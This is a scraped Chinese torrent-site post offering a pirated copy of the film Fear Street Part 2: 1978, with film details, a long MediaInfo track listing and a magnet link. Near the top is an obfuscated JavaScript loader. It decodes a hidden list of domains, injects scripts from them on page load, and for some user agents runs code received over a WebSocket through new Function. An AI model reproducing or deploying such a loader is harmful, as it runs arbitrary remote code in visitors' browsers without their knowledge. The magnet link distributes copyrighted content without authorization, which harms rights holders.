恐惧街2[中文字幕]Fear.Street.Part.2.1978.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264-迅雷下载 13.10GB

版主小s 22天前 176

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 恐惧街2 / 恐惧大街2:1978 / 恐惧街2:1978 / Fear Street Part 2: 1978

◎片 名 Fear Street 2

◎年 代 2021

◎产 地 美国

◎类 别 悬疑 / 恐怖

◎语 言 英语

◎上映日期 2021-07-09(美国)

◎IMDb链接 https://www.imdb.com/title/tt9701940/

◎豆瓣评分 6.4/10 (725人评价)

◎豆瓣链接 https://movie.douban.com/subject/30444938/

◎片 长 110分钟

◎导 演 丽恩·贾尼埃克 Leigh Janiak (id:1377370)

◎编 剧 扎克·奥尔维奇 Zak Olkewicz (id:1409124)

丽恩·贾尼埃克 Leigh Janiak (id:1377370)

R·L·斯坦 R.L. Stine (id:1028271)

◎演 员 萨迪·辛克 Sadie Sink (id:1378568)

埃米莉·拉德 Emily Rudd (id:1365205)

吉莉安·雅各布斯 Gillian Jacobs (id:1274992)

马修·祖克 Matthew Zuk (id:1392747)

基亚娜·马德拉 Kiana Madeira (id:1360691)

小本杰明·弗洛雷斯 Benjamin Flores Jr. (id:1386100)

奥利维亚·韦尔奇 Olivia Welch (id:1457008)

布兰登·斯平克 Brandon Spink (id:1356027)

基娅拉·奥利勒拉 Chiara Aurelia (id:1358721)

伊登·坎贝尔 Eden Campbell (id:1424099)

Ted Sutherland Ted Sutherland (id:1393248)

迈克·普罗沃斯 Michael Provost (id:1399122)

德鲁·谢伊德 Drew Scheid (id:1405818)

芮安·辛普金斯 Ryan Simpkins (id:1000306)

乔丹娜·斯皮罗 Jordana Spiro (id:1000203)

乔迪恩·迪纳塔莱 Jordyn DiNatale (id:1453669)

艾米丽·布罗斯特 Emily Brobst (id:1195858)

迈克尔·钱德勒 Michael Chandler (id:1378740)

阿什利·祖克曼 Ashley Zukerman (id:1315353)

弗莱德·赫钦格 Fred Hechinger (id:1395178)

Jana Allen Jana Allen (id:1454728)

托德·艾伦·德金 Todd Allen Durkin (id:1382745)

Chase Ledgerwood Chase Ledgerwood (id:1392765)

◎标 签 恐怖 / 美国 / 2021 / 悬疑 / 超自然 / 惊悚 / 改编 / 美国电影

◎简 介

在遭到诅咒的阴暗小镇上,杀人魔连续杀人,夜翼营人心惶惶,原本的欢乐夏日顿时成为恐怖的求生血战。

  1. General

  2. Unique ID : 52863908066954438598162807281247062828 (0x27C537E5F082504BEE8F4E9EC8EC0B2C)

  3. Complete name : Fear.[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.1 GiB

  7. Duration : 1 h 50 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 16.9 Mb/s

  10. Encoded date : UTC 2021-07-09 08:45:22

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 50 min

  23. Bit rate mode : Variable

  24. Bit rate : 6 524 kb/s

  25. Maximum bit rate : 20.0 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.131

  36. Stream size : 5.05 GiB (39%)

  37. Writing library : x264 core 148 r2722 1b0121b

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  39. Default : Yes

  40. Forced : No


  41. Audio #1

  42. ID : 2

  43. Format : E-AC-3 JOC

  44. Format/Info : Enhanced AC-3 with Joint Object Coding

  45. Commercial name : Dolby Digital Plus with Dolby Atmos

  46. Codec ID : A_EAC3

  47. Duration : 1 h 50 min

  48. Bit rate mode : Constant

  49. Bit rate : 768 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : L R C LFE Ls Rs

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 609 MiB (5%)

  56. Title : English

  57. Language : English

  58. Service kind : Complete Main

  59. Default : Yes

  60. Forced : No

  61. Complexity index : 16

  62. Number of dynamic objects : 15

  63. Bed channel count : 1 channel

  64. Bed channel configuration : LFE


  65. Audio #2

  66. ID : 3

  67. Format : E-AC-3

  68. Format/Info : Enhanced AC-3

  69. Commercial name : Dolby Digital Plus

  70. Codec ID : A_EAC3

  71. Duration : 1 h 50 min

  72. Bit rate mode : Constant

  73. Bit rate : 640 kb/s

  74. Channel(s) : 6 channels

  75. Channel layout : L R C LFE Ls Rs

  76. Sampling rate : 48.0 kHz

  77. Frame rate : 31.250 FPS (1536 SPF)

  78. Compression mode : Lossy

  79. Stream size : 508 MiB (4%)

  80. Title : Czech

  81. Language : Czech

  82. Service kind : Complete Main

  83. Default : No

  84. Forced : No


  85. Audio #3

  86. ID : 4

  87. Format : E-AC-3

  88. Format/Info : Enhanced AC-3

  89. Commercial name : Dolby Digital Plus

  90. Codec ID : A_EAC3

  91. Duration : 1 h 50 min

  92. Bit rate mode : Constant

  93. Bit rate : 640 kb/s

  94. Channel(s) : 6 channels

  95. Channel layout : L R C LFE Ls Rs

  96. Sampling rate : 48.0 kHz

  97. Frame rate : 31.250 FPS (1536 SPF)

  98. Compression mode : Lossy

  99. Stream size : 508 MiB (4%)

  100. Title : French

  101. Language : French

  102. Service kind : Complete Main

  103. Default : No

  104. Forced : No


  105. Audio #4

  106. ID : 5

  107. Format : E-AC-3

  108. Format/Info : Enhanced AC-3

  109. Commercial name : Dolby Digital Plus

  110. Codec ID : A_EAC3

  111. Duration : 1 h 50 min

  112. Bit rate mode : Constant

  113. Bit rate : 640 kb/s

  114. Channel(s) : 6 channels

  115. Channel layout : L R C LFE Ls Rs

  116. Sampling rate : 48.0 kHz

  117. Frame rate : 31.250 FPS (1536 SPF)

  118. Compression mode : Lossy

  119. Stream size : 508 MiB (4%)

  120. Title : German

  121. Language : German

  122. Service kind : Complete Main

  123. Default : No

  124. Forced : No


  125. Audio #5

  126. ID : 6

  127. Format : E-AC-3

  128. Format/Info : Enhanced AC-3

  129. Commercial name : Dolby Digital Plus

  130. Codec ID : A_EAC3

  131. Duration : 1 h 50 min

  132. Bit rate mode : Constant

  133. Bit rate : 640 kb/s

  134. Channel(s) : 6 channels

  135. Channel layout : L R C LFE Ls Rs

  136. Sampling rate : 48.0 kHz

  137. Frame rate : 31.250 FPS (1536 SPF)

  138. Compression mode : Lossy

  139. Stream size : 508 MiB (4%)

  140. Title : Hindi

  141. Language : Hindi

  142. Service kind : Complete Main

  143. Default : No

  144. Forced : No


  145. Audio #6

  146. ID : 7

  147. Format : E-AC-3

  148. Format/Info : Enhanced AC-3

  149. Commercial name : Dolby Digital Plus

  150. Codec ID : A_EAC3

  151. Duration : 1 h 50 min

  152. Bit rate mode : Constant

  153. Bit rate : 640 kb/s

  154. Channel(s) : 6 channels

  155. Channel layout : L R C LFE Ls Rs

  156. Sampling rate : 48.0 kHz

  157. Frame rate : 31.250 FPS (1536 SPF)

  158. Compression mode : Lossy

  159. Stream size : 508 MiB (4%)

  160. Title : Hungarian

  161. Language : Hungarian

  162. Service kind : Complete Main

  163. Default : No

  164. Forced : No


  165. Audio #7

  166. ID : 8

  167. Format : E-AC-3

  168. Format/Info : Enhanced AC-3

  169. Commercial name : Dolby Digital Plus

  170. Codec ID : A_EAC3

  171. Duration : 1 h 50 min

  172. Bit rate mode : Constant

  173. Bit rate : 640 kb/s

  174. Channel(s) : 6 channels

  175. Channel layout : L R C LFE Ls Rs

  176. Sampling rate : 48.0 kHz

  177. Frame rate : 31.250 FPS (1536 SPF)

  178. Compression mode : Lossy

  179. Stream size : 508 MiB (4%)

  180. Title : Italian

  181. Language : Italian

  182. Service kind : Complete Main

  183. Default : No

  184. Forced : No


  185. Audio #8

  186. ID : 9

  187. Format : E-AC-3

  188. Format/Info : Enhanced AC-3

  189. Commercial name : Dolby Digital Plus

  190. Codec ID : A_EAC3

  191. Duration : 1 h 50 min

  192. Bit rate mode : Constant

  193. Bit rate : 640 kb/s

  194. Channel(s) : 6 channels

  195. Channel layout : L R C LFE Ls Rs

  196. Sampling rate : 48.0 kHz

  197. Frame rate : 31.250 FPS (1536 SPF)

  198. Compression mode : Lossy

  199. Stream size : 508 MiB (4%)

  200. Title : Japanese

  201. Language : Japanese

  202. Service kind : Complete Main

  203. Default : No

  204. Forced : No


  205. Audio #9

  206. ID : 10

  207. Format : E-AC-3

  208. Format/Info : Enhanced AC-3

  209. Commercial name : Dolby Digital Plus

  210. Codec ID : A_EAC3

  211. Duration : 1 h 50 min

  212. Bit rate mode : Constant

  213. Bit rate : 640 kb/s

  214. Channel(s) : 6 channels

  215. Channel layout : L R C LFE Ls Rs

  216. Sampling rate : 48.0 kHz

  217. Frame rate : 31.250 FPS (1536 SPF)

  218. Compression mode : Lossy

  219. Stream size : 508 MiB (4%)

  220. Title : Polish

  221. Language : Polish

  222. Service kind : Complete Main

  223. Default : No

  224. Forced : No


  225. Audio #10

  226. ID : 11

  227. Format : E-AC-3

  228. Format/Info : Enhanced AC-3

  229. Commercial name : Dolby Digital Plus

  230. Codec ID : A_EAC3

  231. Duration : 1 h 50 min

  232. Bit rate mode : Constant

  233. Bit rate : 640 kb/s

  234. Channel(s) : 6 channels

  235. Channel layout : L R C LFE Ls Rs

  236. Sampling rate : 48.0 kHz

  237. Frame rate : 31.250 FPS (1536 SPF)

  238. Compression mode : Lossy

  239. Stream size : 508 MiB (4%)

  240. Title : Brazilian Portuguese

  241. Language : Portuguese

  242. Service kind : Complete Main

  243. Default : No

  244. Forced : No


  245. Audio #11

  246. ID : 12

  247. Format : E-AC-3

  248. Format/Info : Enhanced AC-3

  249. Commercial name : Dolby Digital Plus

  250. Codec ID : A_EAC3

  251. Duration : 1 h 50 min

  252. Bit rate mode : Constant

  253. Bit rate : 640 kb/s

  254. Channel(s) : 6 channels

  255. Channel layout : L R C LFE Ls Rs

  256. Sampling rate : 48.0 kHz

  257. Frame rate : 31.250 FPS (1536 SPF)

  258. Compression mode : Lossy

  259. Stream size : 508 MiB (4%)

  260. Title : Russian

  261. Language : Russian

  262. Service kind : Complete Main

  263. Default : No

  264. Forced : No


  265. Audio #12

  266. ID : 13

  267. Format : E-AC-3

  268. Format/Info : Enhanced AC-3

  269. Commercial name : Dolby Digital Plus

  270. Codec ID : A_EAC3

  271. Duration : 1 h 50 min

  272. Bit rate mode : Constant

  273. Bit rate : 640 kb/s

  274. Channel(s) : 6 channels

  275. Channel layout : L R C LFE Ls Rs

  276. Sampling rate : 48.0 kHz

  277. Frame rate : 31.250 FPS (1536 SPF)

  278. Compression mode : Lossy

  279. Stream size : 508 MiB (4%)

  280. Title : Spanish

  281. Language : Spanish

  282. Service kind : Complete Main

  283. Default : No

  284. Forced : No


  285. Audio #13

  286. ID : 14

  287. Format : E-AC-3

  288. Format/Info : Enhanced AC-3

  289. Commercial name : Dolby Digital Plus

  290. Codec ID : A_EAC3

  291. Duration : 1 h 50 min

  292. Bit rate mode : Constant

  293. Bit rate : 640 kb/s

  294. Channel(s) : 6 channels

  295. Channel layout : L R C LFE Ls Rs

  296. Sampling rate : 48.0 kHz

  297. Frame rate : 31.250 FPS (1536 SPF)

  298. Compression mode : Lossy

  299. Stream size : 508 MiB (4%)

  300. Title : European Spanish

  301. Language : Spanish

  302. Service kind : Complete Main

  303. Default : No

  304. Forced : No


  305. Audio #14

  306. ID : 15

  307. Format : E-AC-3

  308. Format/Info : Enhanced AC-3

  309. Commercial name : Dolby Digital Plus

  310. Codec ID : A_EAC3

  311. Duration : 1 h 50 min

  312. Bit rate mode : Constant

  313. Bit rate : 640 kb/s

  314. Channel(s) : 6 channels

  315. Channel layout : L R C LFE Ls Rs

  316. Sampling rate : 48.0 kHz

  317. Frame rate : 31.250 FPS (1536 SPF)

  318. Compression mode : Lossy

  319. Stream size : 508 MiB (4%)

  320. Title : Thai

  321. Language : Thai

  322. Service kind : Complete Main

  323. Default : No

  324. Forced : No


  325. Audio #15

  326. ID : 16

  327. Format : E-AC-3

  328. Format/Info : Enhanced AC-3

  329. Commercial name : Dolby Digital Plus

  330. Codec ID : A_EAC3

  331. Duration : 1 h 50 min

  332. Bit rate mode : Constant

  333. Bit rate : 640 kb/s

  334. Channel(s) : 6 channels

  335. Channel layout : L R C LFE Ls Rs

  336. Sampling rate : 48.0 kHz

  337. Frame rate : 31.250 FPS (1536 SPF)

  338. Compression mode : Lossy

  339. Stream size : 508 MiB (4%)

  340. Title : Turkish

  341. Language : Turkish

  342. Service kind : Complete Main

  343. Default : No

  344. Forced : No


  345. Audio #16

  346. ID : 17

  347. Format : E-AC-3

  348. Format/Info : Enhanced AC-3

  349. Commercial name : Dolby Digital Plus

  350. Codec ID : A_EAC3

  351. Duration : 1 h 50 min

  352. Bit rate mode : Constant

  353. Bit rate : 640 kb/s

  354. Channel(s) : 6 channels

  355. Channel layout : L R C LFE Ls Rs

  356. Sampling rate : 48.0 kHz

  357. Frame rate : 31.250 FPS (1536 SPF)

  358. Compression mode : Lossy

  359. Stream size : 508 MiB (4%)

  360. Title : Ukrainian

  361. Language : Ukrainian

  362. Service kind : Complete Main

  363. Default : No

  364. Forced : No


  365. Text #1

  366. ID : 18

  367. Format : UTF-8

  368. Codec ID : S_TEXT/UTF8

  369. Codec ID/Info : UTF-8 Plain Text

  370. Duration : 1 h 43 min

  371. Bit rate : 98 b/s

  372. Count of elements : 1862

  373. Stream size : 75.2 KiB (0%)

  374. Title : English

  375. Language : English

  376. Default : No

  377. Forced : No


  378. Text #2

  379. ID : 19

  380. Format : UTF-8

  381. Codec ID : S_TEXT/UTF8

  382. Codec ID/Info : UTF-8 Plain Text

  383. Duration : 1 h 49 min

  384. Bit rate : 84 b/s

  385. Count of elements : 1361

  386. Stream size : 67.6 KiB (0%)

  387. Title : Arabic

  388. Language : Arabic

  389. Default : No

  390. Forced : No


  391. Text #3

  392. ID : 20

  393. Format : UTF-8

  394. Codec ID : S_TEXT/UTF8

  395. Codec ID/Info : UTF-8 Plain Text

  396. Duration : 1 h 49 min

  397. Bit rate : 45 b/s

  398. Count of elements : 1372

  399. Stream size : 36.5 KiB (0%)

  400. Title : Chinese Simplified

  401. Language : Chinese

  402. Default : No

  403. Forced : No


  404. Text #4

  405. ID : 21

  406. Format : UTF-8

  407. Codec ID : S_TEXT/UTF8

  408. Codec ID/Info : UTF-8 Plain Text

  409. Duration : 1 h 49 min

  410. Bit rate : 47 b/s

  411. Count of elements : 1372

  412. Stream size : 37.7 KiB (0%)

  413. Title : Chinese Traditional

  414. Language : Chinese

  415. Default : No

  416. Forced : No


  417. Text #5

  418. ID : 22

  419. Format : UTF-8

  420. Codec ID : S_TEXT/UTF8

  421. Codec ID/Info : UTF-8 Plain Text

  422. Duration : 1 h 49 min

  423. Bit rate : 43 b/s

  424. Count of elements : 1349

  425. Stream size : 34.6 KiB (0%)

  426. Title : Croatian

  427. Language : Croatian

  428. Default : No

  429. Forced : No


  430. Text #6

  431. ID : 23

  432. Format : UTF-8

  433. Codec ID : S_TEXT/UTF8

  434. Codec ID/Info : UTF-8 Plain Text

  435. Duration : 1 h 49 min

  436. Bit rate : 49 b/s

  437. Count of elements : 1372

  438. Stream size : 39.6 KiB (0%)

  439. Title : Czech

  440. Language : Czech

  441. Default : No

  442. Forced : No


  443. Text #7

  444. ID : 24

  445. Format : UTF-8

  446. Codec ID : S_TEXT/UTF8

  447. Codec ID/Info : UTF-8 Plain Text

  448. Duration : 1 h 49 min

  449. Bit rate : 49 b/s

  450. Count of elements : 1169

  451. Stream size : 39.3 KiB (0%)

  452. Title : Danish

  453. Language : Danish

  454. Default : No

  455. Forced : No


  456. Text #8

  457. ID : 25

  458. Format : UTF-8

  459. Codec ID : S_TEXT/UTF8

  460. Codec ID/Info : UTF-8 Plain Text

  461. Duration : 1 h 49 min

  462. Bit rate : 43 b/s

  463. Count of elements : 1029

  464. Stream size : 34.4 KiB (0%)

  465. Title : Dutch

  466. Language : Dutch

  467. Default : No

  468. Forced : No


  469. Text #9

  470. ID : 26

  471. Format : UTF-8

  472. Codec ID : S_TEXT/UTF8

  473. Codec ID/Info : UTF-8 Plain Text

  474. Duration : 1 h 49 min

  475. Bit rate : 48 b/s

  476. Count of elements : 1169

  477. Stream size : 39.0 KiB (0%)

  478. Title : Finnish

  479. Language : Finnish

  480. Default : No

  481. Forced : No


  482. Text #10

  483. ID : 27

  484. Format : UTF-8

  485. Codec ID : S_TEXT/UTF8

  486. Codec ID/Info : UTF-8 Plain Text

  487. Duration : 1 h 49 min

  488. Bit rate : 47 b/s

  489. Count of elements : 1358

  490. Stream size : 38.0 KiB (0%)

  491. Title : French

  492. Language : French

  493. Default : No

  494. Forced : No


  495. Text #11

  496. ID : 28

  497. Format : UTF-8

  498. Codec ID : S_TEXT/UTF8

  499. Codec ID/Info : UTF-8 Plain Text

  500. Duration : 1 h 49 min

  501. Bit rate : 49 b/s

  502. Count of elements : 1294

  503. Stream size : 39.3 KiB (0%)

  504. Title : German

  505. Language : German

  506. Default : No

  507. Forced : No


  508. Text #12

  509. ID : 29

  510. Format : UTF-8

  511. Codec ID : S_TEXT/UTF8

  512. Codec ID/Info : UTF-8 Plain Text

  513. Duration : 1 h 49 min

  514. Bit rate : 80 b/s

  515. Count of elements : 1362

  516. Stream size : 64.4 KiB (0%)

  517. Title : Greek

  518. Language : Greek

  519. Default : No

  520. Forced : No


  521. Text #13

  522. ID : 30

  523. Format : UTF-8

  524. Codec ID : S_TEXT/UTF8

  525. Codec ID/Info : UTF-8 Plain Text

  526. Duration : 1 h 49 min

  527. Bit rate : 78 b/s

  528. Count of elements : 1360

  529. Stream size : 62.4 KiB (0%)

  530. Title : Hebrew

  531. Language : Hebrew

  532. Default : No

  533. Forced : No


  534. Text #14

  535. ID : 31

  536. Format : UTF-8

  537. Codec ID : S_TEXT/UTF8

  538. Codec ID/Info : UTF-8 Plain Text

  539. Duration : 1 h 49 min

  540. Bit rate : 47 b/s

  541. Count of elements : 1371

  542. Stream size : 37.7 KiB (0%)

  543. Title : Hungarian

  544. Language : Hungarian

  545. Default : No

  546. Forced : No


  547. Text #15

  548. ID : 32

  549. Format : UTF-8

  550. Codec ID : S_TEXT/UTF8

  551. Codec ID/Info : UTF-8 Plain Text

  552. Duration : 1 h 49 min

  553. Bit rate : 49 b/s

  554. Count of elements : 1372

  555. Stream size : 39.3 KiB (0%)

  556. Title : Indonesian

  557. Language : Indonesian

  558. Default : No

  559. Forced : No


  560. Text #16

  561. ID : 33

  562. Format : UTF-8

  563. Codec ID : S_TEXT/UTF8

  564. Codec ID/Info : UTF-8 Plain Text

  565. Duration : 1 h 49 min

  566. Bit rate : 50 b/s

  567. Count of elements : 1334

  568. Stream size : 40.2 KiB (0%)

  569. Title : Italian

  570. Language : Italian

  571. Default : No

  572. Forced : No


  573. Text #17

  574. ID : 34

  575. Format : UTF-8

  576. Codec ID : S_TEXT/UTF8

  577. Codec ID/Info : UTF-8 Plain Text

  578. Duration : 1 h 49 min

  579. Bit rate : 43 b/s

  580. Count of elements : 1401

  581. Stream size : 34.7 KiB (0%)

  582. Title : Japanese

  583. Language : Japanese

  584. Default : No

  585. Forced : No


  586. Text #18

  587. ID : 35

  588. Format : UTF-8

  589. Codec ID : S_TEXT/UTF8

  590. Codec ID/Info : UTF-8 Plain Text

  591. Duration : 1 h 49 min

  592. Bit rate : 53 b/s

  593. Count of elements : 1380

  594. Stream size : 43.0 KiB (0%)

  595. Title : Korean

  596. Language : Korean

  597. Default : No

  598. Forced : No


  599. Text #19

  600. ID : 36

  601. Format : UTF-8

  602. Codec ID : S_TEXT/UTF8

  603. Codec ID/Info : UTF-8 Plain Text

  604. Duration : 1 h 49 min

  605. Bit rate : 46 b/s

  606. Count of elements : 1392

  607. Stream size : 37.4 KiB (0%)

  608. Title : Malay

  609. Language : Malay

  610. Default : No

  611. Forced : No


  612. Text #20

  613. ID : 37

  614. Format : UTF-8

  615. Codec ID : S_TEXT/UTF8

  616. Codec ID/Info : UTF-8 Plain Text

  617. Duration : 1 h 49 min

  618. Bit rate : 50 b/s

  619. Count of elements : 1169

  620. Stream size : 40.2 KiB (0%)

  621. Title : Norwegian Bokmal

  622. Language : Norwegian Bokmal

  623. Default : No

  624. Forced : No


  625. Text #21

  626. ID : 38

  627. Format : UTF-8

  628. Codec ID : S_TEXT/UTF8

  629. Codec ID/Info : UTF-8 Plain Text

  630. Duration : 1 h 49 min

  631. Bit rate : 49 b/s

  632. Count of elements : 1372

  633. Stream size : 39.4 KiB (0%)

  634. Title : Polish

  635. Language : Polish

  636. Default : No

  637. Forced : No


  638. Text #22

  639. ID : 39

  640. Format : UTF-8

  641. Codec ID : S_TEXT/UTF8

  642. Codec ID/Info : UTF-8 Plain Text

  643. Duration : 1 h 49 min

  644. Bit rate : 48 b/s

  645. Count of elements : 1356

  646. Stream size : 38.9 KiB (0%)

  647. Title : Portuguese

  648. Language : Portuguese

  649. Default : No

  650. Forced : No


  651. Text #23

  652. ID : 40

  653. Format : UTF-8

  654. Codec ID : S_TEXT/UTF8

  655. Codec ID/Info : UTF-8 Plain Text

  656. Duration : 1 h 49 min

  657. Bit rate : 49 b/s

  658. Count of elements : 1368

  659. Stream size : 39.7 KiB (0%)

  660. Title : Brazilian Portuguese

  661. Language : Portuguese

  662. Default : No

  663. Forced : No


  664. Text #24

  665. ID : 41

  666. Format : UTF-8

  667. Codec ID : S_TEXT/UTF8

  668. Codec ID/Info : UTF-8 Plain Text

  669. Duration : 1 h 49 min

  670. Bit rate : 44 b/s

  671. Count of elements : 1358

  672. Stream size : 35.2 KiB (0%)

  673. Title : Romanian

  674. Language : Romanian

  675. Default : No

  676. Forced : No


  677. Text #25

  678. ID : 42

  679. Format : UTF-8

  680. Codec ID : S_TEXT/UTF8

  681. Codec ID/Info : UTF-8 Plain Text

  682. Duration : 1 h 49 min

  683. Bit rate : 78 b/s

  684. Count of elements : 1365

  685. Stream size : 62.6 KiB (0%)

  686. Title : Russian

  687. Language : Russian

  688. Default : No

  689. Forced : No


  690. Text #26

  691. ID : 43

  692. Format : UTF-8

  693. Codec ID : S_TEXT/UTF8

  694. Codec ID/Info : UTF-8 Plain Text

  695. Duration : 1 h 49 min

  696. Bit rate : 46 b/s

  697. Count of elements : 1360

  698. Stream size : 37.3 KiB (0%)

  699. Title : Spanish

  700. Language : Spanish

  701. Default : No

  702. Forced : No


  703. Text #27

  704. ID : 44

  705. Format : UTF-8

  706. Codec ID : S_TEXT/UTF8

  707. Codec ID/Info : UTF-8 Plain Text

  708. Duration : 1 h 49 min

  709. Bit rate : 49 b/s

  710. Count of elements : 1318

  711. Stream size : 39.5 KiB (0%)

  712. Title : European Spanish

  713. Language : Spanish

  714. Default : No

  715. Forced : No


  716. Text #28

  717. ID : 45

  718. Format : UTF-8

  719. Codec ID : S_TEXT/UTF8

  720. Codec ID/Info : UTF-8 Plain Text

  721. Duration : 1 h 49 min

  722. Bit rate : 47 b/s

  723. Count of elements : 1132

  724. Stream size : 38.1 KiB (0%)

  725. Title : Swedish

  726. Language : Swedish

  727. Default : No

  728. Forced : No


  729. Text #29

  730. ID : 46

  731. Format : UTF-8

  732. Codec ID : S_TEXT/UTF8

  733. Codec ID/Info : UTF-8 Plain Text

  734. Duration : 1 h 49 min

  735. Bit rate : 110 b/s

  736. Count of elements : 1372

  737. Stream size : 88.1 KiB (0%)

  738. Title : Thai

  739. Language : Thai

  740. Default : No

  741. Forced : No


  742. Text #30

  743. ID : 47

  744. Format : UTF-8

  745. Codec ID : S_TEXT/UTF8

  746. Codec ID/Info : UTF-8 Plain Text

  747. Duration : 1 h 49 min

  748. Bit rate : 47 b/s

  749. Count of elements : 1366

  750. Stream size : 38.2 KiB (0%)

  751. Title : Turkish

  752. Language : Turkish

  753. Default : Yes

  754. Forced : No


  755. Text #31

  756. ID : 48

  757. Format : UTF-8

  758. Codec ID : S_TEXT/UTF8

  759. Codec ID/Info : UTF-8 Plain Text

  760. Duration : 1 h 49 min

  761. Bit rate : 78 b/s

  762. Count of elements : 1360

  763. Stream size : 62.4 KiB (0%)

  764. Title : Ukrainian

  765. Language : Ukrainian

  766. Default : No

  767. Forced : No


  768. Text #32

  769. ID : 49

  770. Format : UTF-8

  771. Codec ID : S_TEXT/UTF8

  772. Codec ID/Info : UTF-8 Plain Text

  773. Duration : 1 h 49 min

  774. Bit rate : 58 b/s

  775. Count of elements : 1370

  776. Stream size : 46.4 KiB (0%)

  777. Title : Vietnamese

  778. Language : Vietnamese

  779. Default : No

  780. Forced : No


TAGS 恐怖 悬疑

磁力链:
  • magnet:?xt=urn:btih:DC9FF872C83741323B158C2A57B62499D4F230E8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回